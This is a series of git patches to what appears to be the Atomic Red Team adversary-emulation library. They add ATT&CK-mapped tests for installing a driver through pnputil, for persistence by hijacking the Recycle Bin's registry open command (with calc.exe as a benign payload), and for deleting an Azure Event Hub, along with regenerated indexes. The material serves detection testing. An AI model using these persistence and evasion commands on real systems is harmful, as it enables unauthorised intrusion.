 | [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Local Accounts](../../T1078.003/T1078.003.md) | [Malicious File](../../T1204.002/T1204.002.md) | [BITS Jobs](../../T1197/T1197.md) | [Authentication Package](../../T1547.002/T1547.002.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [DCSync](../../T1003.006/T1003.006.md) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service](../../T1567/T1567.md) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [DCSync](../../T1003.006/T1003.006.md) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service](../../T1567/T1567.md) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Replication Through Removable Media](../../T1091/T1091.md) | [Native API](../../T1106/T1106.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Scanning](../../T1046/T1046.md) | [Replication Through Removable Media](../../T1091/T1091.md) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Share Discovery](../../T1135/T1135.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [Forced Authentication](../../T1187/T1187.md) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index c4eb414d..89645b81 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -11685,7 +11685,25 @@ privilege-escalation:
       - 'Kernel: Kernel Module Load'
       - 'Driver: Driver Load'
       - 'Process: OS API Execution'
-    atomic_tests: []
+      identifier: T1547
+    atomic_tests:
+    - name: Add a driver
+      auto_generated_guid: cb01b3da-b0e7-4e24-bf6d-de5223526785
+      description: 'Install a driver via pnputil.exe lolbin
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        driver_inf:
+          description: A built-in, already installed windows driver inf
+          type: Path
+          default: C:\Windows\INF\usbstor.inf
+      executor:
+        command: 'pnputil.exe /add-driver "#{driver_inf}"
+
+'
+        name: command_prompt
   T1037:
     technique:
       id: attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334
@@ -42594,7 +42612,25 @@ persistence:
       - 'Kernel: Kernel Module Load'
       - 'Driver: Driver Load'
       - 'Process: OS API Execution'
-    atomic_tests: []
+      identifier: T1547
+    atomic_tests:
+    - name: Add a driver
+      auto_generated_guid: cb01b3da-b0e7-4e24-bf6d-de5223526785
+      description: 'Install a driver via pnputil.exe lolbin
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        driver_inf:
+          description: A built-in, already installed windows driver inf
+          type: Path
+          default: C:\Windows\INF\usbstor.inf
+      executor:
+        command: 'pnputil.exe /add-driver "#{driver_inf}"
+
+'
+        name: command_prompt
   T1037:
     technique:
       id: attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334
diff --git a/atomics/T1547/T1547.md b/atomics/T1547/T1547.md
new file mode 100644
index 00000000..d08968cd
--- /dev/null
+++ b/atomics/T1547/T1547.md
@@ -0,0 +1,44 @@
+# T1547 - Boot or Logon Autostart Execution
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1547)
+<blockquote>Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
+
+Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Add a driver](#atomic-test-1---add-a-driver)
+
+
+<br/>
+
+## Atomic Test #1 - Add a driver
+Install a driver via pnputil.exe lolbin
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** cb01b3da-b0e7-4e24-bf6d-de5223526785
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| driver_inf | A built-in, already installed windows driver inf | Path | C:&#92;Windows&#92;INF&#92;usbstor.inf|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+pnputil.exe /add-driver "#{driver_inf}"
+```
+
+
+
+
+
+
+<br/>

From d3a53714b4e169c5def9b5a63ea4be6267f2bd7a Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Mon, 14 Mar 2022 18:41:04 +0100
Subject: [PATCH 34/83] Add persistance via Recycle bin (#1809)

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1547.001/T1547.001.yaml | 11 +++++++++++
 1 file changed, 11 insertions(+)

diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml
index 10db44a9..37687a1c 100644
--- a/atomics/T1547.001/T1547.001.yaml
+++ b/atomics/T1547.001/T1547.001.yaml
@@ -139,3 +139,14 @@ atomic_tests:
     cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore
     name: powershell
     elevation_required: true 
+
+- name: Add persistance via Recycle bin
+  description: |
+    Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)
+    User have to clic on the recycle bin to lauch the payload (here calc)
+  supported_platforms:
+  - windows
+  executor:
+    command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f  
+    cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f
+    name: command_prompt

From de94c41347daf3e5b17dcaa54839c0860b6d1919 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Mon, 14 Mar 2022 17:41:26 +0000
Subject: [PATCH 35/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1547.001/T1547.001.yaml | 1 +
 atomics/used_guids.txt           | 1 +
 2 files changed, 2 insertions(+)

diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml
index 37687a1c..3c41bed1 100644
--- a/atomics/T1547.001/T1547.001.yaml
+++ b/atomics/T1547.001/T1547.001.yaml
@@ -141,6 +141,7 @@ atomic_tests:
     elevation_required: true 
 
 - name: Add persistance via Recycle bin
+  auto_generated_guid: bda6a3d6-7aa7-4e89-908b-306772e9662f
   description: |
     Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)
     User have to clic on the recycle bin to lauch the payload (here calc)
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 00099f88..6c869322 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -899,3 +899,4 @@ e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
 3177f4da-3d4b-4592-8bdc-aa23d0b2e843
 b2698b33-984c-4a1c-93bb-e4ba72a0babb
 cb01b3da-b0e7-4e24-bf6d-de5223526785
+bda6a3d6-7aa7-4e89-908b-306772e9662f

From f3e3346b1aa07768ca0b68a6da9591a8dc73a1c5 Mon Sep 17 00:00:00 2001
From: Araveti Esanya Reddy <esanya.araveti@kudelskisecurity.com>
Date: Mon, 14 Mar 2022 23:11:29 +0530
Subject: [PATCH 36/83] updated as per review comments

---
 atomics/T1562.001/T1562.001.yaml | 48 ------------------------------
 atomics/T1562.008/T1562.008.yaml | 51 ++++++++++++++++++++++++++++++++
 2 files changed, 51 insertions(+), 48 deletions(-)

diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index 947889a3..53edc348 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -574,51 +574,3 @@ atomic_tests:
       cmd /c #{DefenderControlExe} /E | Out-Null
     name: powershell
     elevation_required: true
-- name: Azure-Defense-Evasion-Eventhub-Deletion
-  auto_generated_guid: 5e09bed0-7d33-453b-9bf3-caea32bff719
-  description: |
-    Identifies an Event Hub deletion in Azure
-  supported_platforms:
-  - azure-ad
-  input_arguments:
-    username:
-      description: Azure username
-      type: String
-      default: null
-    password:
-      description: Azure password
-      type: String
-      default: null
-    event_hub_name:
-      description: Name of the eventhub
-      type: String
-      default: "test_eventhub"
-    resource_group:
-      description: Name of the resource group
-      type: String
-      default: null
-    name_space_name:
-      description: Name of the NameSpace
-      type: String
-      default: null
-  dependency_executor_name: powershell
-  dependencies:
-  - description: |
-      Install-Module -Name Az
-    prereq_command: |
-      try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
-    get_prereq_command: |
-      Install-Module -Name AzureAD -Force       
-  executor:
-    command: |
-      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
-      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
-      Connect-AzureAD -Credential $creds
-      New-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name}
-    cleanup_command: |
-      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
-      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
-      Connect-AzureAD -Credential $creds
-      Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}
-    name: powershell
-    elevation_required: false  
diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml
index 2b76c7a9..5f70a039 100644
--- a/atomics/T1562.008/T1562.008.yaml
+++ b/atomics/T1562.008/T1562.008.yaml
@@ -39,3 +39,54 @@ atomic_tests:
        aws s3 rb s3://#{s3_bucket_name} --force 
     name: sh
     elevation_required: false
+- name: Azure - Eventhub Deletion
+  auto_generated_guid: 5e09bed0-7d33-453b-9bf3-caea32bff719
+  description: |
+    Identifies an Event Hub deletion in Azure.
+    An Event Hub is an event processing service that ingests and processes large volumes of events and data.
+    An adversary may delete an Event Hub in an attempt to evade detection.
+    https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about.
+  supported_platforms:
+  - iaas:azure
+  input_arguments:
+    username:
+      description: Azure username
+      type: String
+      default: null
+    password:
+      description: Azure password
+      type: String
+      default: null
+    event_hub_name:
+      description: Name of the eventhub
+      type: String
+      default: "test_eventhub"
+    resource_group:
+      description: Name of the resource group
+      type: String
+      default: null
+    name_space_name:
+      description: Name of the NameSpace
+      type: String
+      default: null
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Install-Module -Name Az
+    prereq_command: |
+      try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AzureAD -Force
+  executor:
+    command: |
+      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+      Connect-AzureAD -Credential $creds
+      New-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name}
+    cleanup_command: |
+      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+      Connect-AzureAD -Credential $creds
+      Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}
+    name: powershell
+    elevation_required: false

From 3947bbc2a51e91ee359dd161756234e5cb09eafa Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 14 Mar 2022 17:41:32 +0000
Subject: [PATCH 37/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  2 ++
 atomics/Indexes/Indexes-CSV/windows-index.csv |  2 ++
 atomics/Indexes/Indexes-Markdown/index.md     |  2 ++
 .../Indexes/Indexes-Markdown/windows-index.md |  2 ++
 atomics/Indexes/index.yaml                    | 26 ++++++++++++++
 atomics/T1547.001/T1547.001.md                | 35 +++++++++++++++++++
 6 files changed, 69 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index e8436c52..385e6757 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -240,6 +240,7 @@ privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious v
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
+privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
@@ -699,6 +700,7 @@ persistence,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file r
 persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
 persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
 persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
+persistence,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
 persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
 persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index e18fe94d..d1c3e403 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -161,6 +161,7 @@ privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious v
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
+privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
@@ -469,6 +470,7 @@ persistence,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file r
 persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
 persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
 persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
+persistence,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
 persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index e2170ff3..01541682 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -406,6 +406,7 @@
   - Atomic Test #5: Suspicious jse file run from startup Folder [windows]
   - Atomic Test #6: Suspicious bat file run from startup Folder [windows]
   - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
+  - Atomic Test #8: Add persistance via Recycle bin [windows]
 - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
   - Atomic Test #1: Scheduled Task Startup Script [windows]
@@ -1134,6 +1135,7 @@
   - Atomic Test #5: Suspicious jse file run from startup Folder [windows]
   - Atomic Test #6: Suspicious bat file run from startup Folder [windows]
   - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
+  - Atomic Test #8: Add persistance via Recycle bin [windows]
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
   - Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index bbea0278..af36968d 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -293,6 +293,7 @@
   - Atomic Test #5: Suspicious jse file run from startup Folder [windows]
   - Atomic Test #6: Suspicious bat file run from startup Folder [windows]
   - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
+  - Atomic Test #8: Add persistance via Recycle bin [windows]
 - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
   - Atomic Test #1: Scheduled Task Startup Script [windows]
@@ -799,6 +800,7 @@
   - Atomic Test #5: Suspicious jse file run from startup Folder [windows]
   - Atomic Test #6: Suspicious bat file run from startup Folder [windows]
   - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
+  - Atomic Test #8: Add persistance via Recycle bin [windows]
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
   - Atomic Test #1: Scheduled Task Startup Script [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 89645b81..fc48a68d 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -18218,6 +18218,19 @@ privilege-escalation:
           Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore
         name: powershell
         elevation_required: true
+    - name: Add persistance via Recycle bin
+      auto_generated_guid: bda6a3d6-7aa7-4e89-908b-306772e9662f
+      description: |
+        Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)
+        User have to clic on the recycle bin to lauch the payload (here calc)
+      supported_platforms:
+      - windows
+      executor:
+        command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command"
+          /ve /d "calc.exe" /f
+        cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open"
+          /f
+        name: command_prompt
   T1134.005:
     technique:
       external_references:
@@ -48923,6 +48936,19 @@ persistence:
           Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore
         name: powershell
         elevation_required: true
+    - name: Add persistance via Recycle bin
+      auto_generated_guid: bda6a3d6-7aa7-4e89-908b-306772e9662f
+      description: |
+        Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)
+        User have to clic on the recycle bin to lauch the payload (here calc)
+      supported_platforms:
+      - windows
+      executor:
+        command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command"
+          /ve /d "calc.exe" /f
+        cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open"
+          /f
+        name: command_prompt
   T1505.001:
     technique:
       external_references:
diff --git a/atomics/T1547.001/T1547.001.md b/atomics/T1547.001/T1547.001.md
index 8db87797..0d2a7137 100644
--- a/atomics/T1547.001/T1547.001.md
+++ b/atomics/T1547.001/T1547.001.md
@@ -56,6 +56,8 @@ Adversaries can use these configuration locations to execute malware, such as re
 
 - [Atomic Test #7 - Add Executable Shortcut Link to User Startup Folder](#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder)
 
+- [Atomic Test #8 - Add persistance via Recycle bin](#atomic-test-8---add-persistance-via-recycle-bin)
+
 
 <br/>
 
@@ -326,4 +328,37 @@ Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - Add persistance via Recycle bin
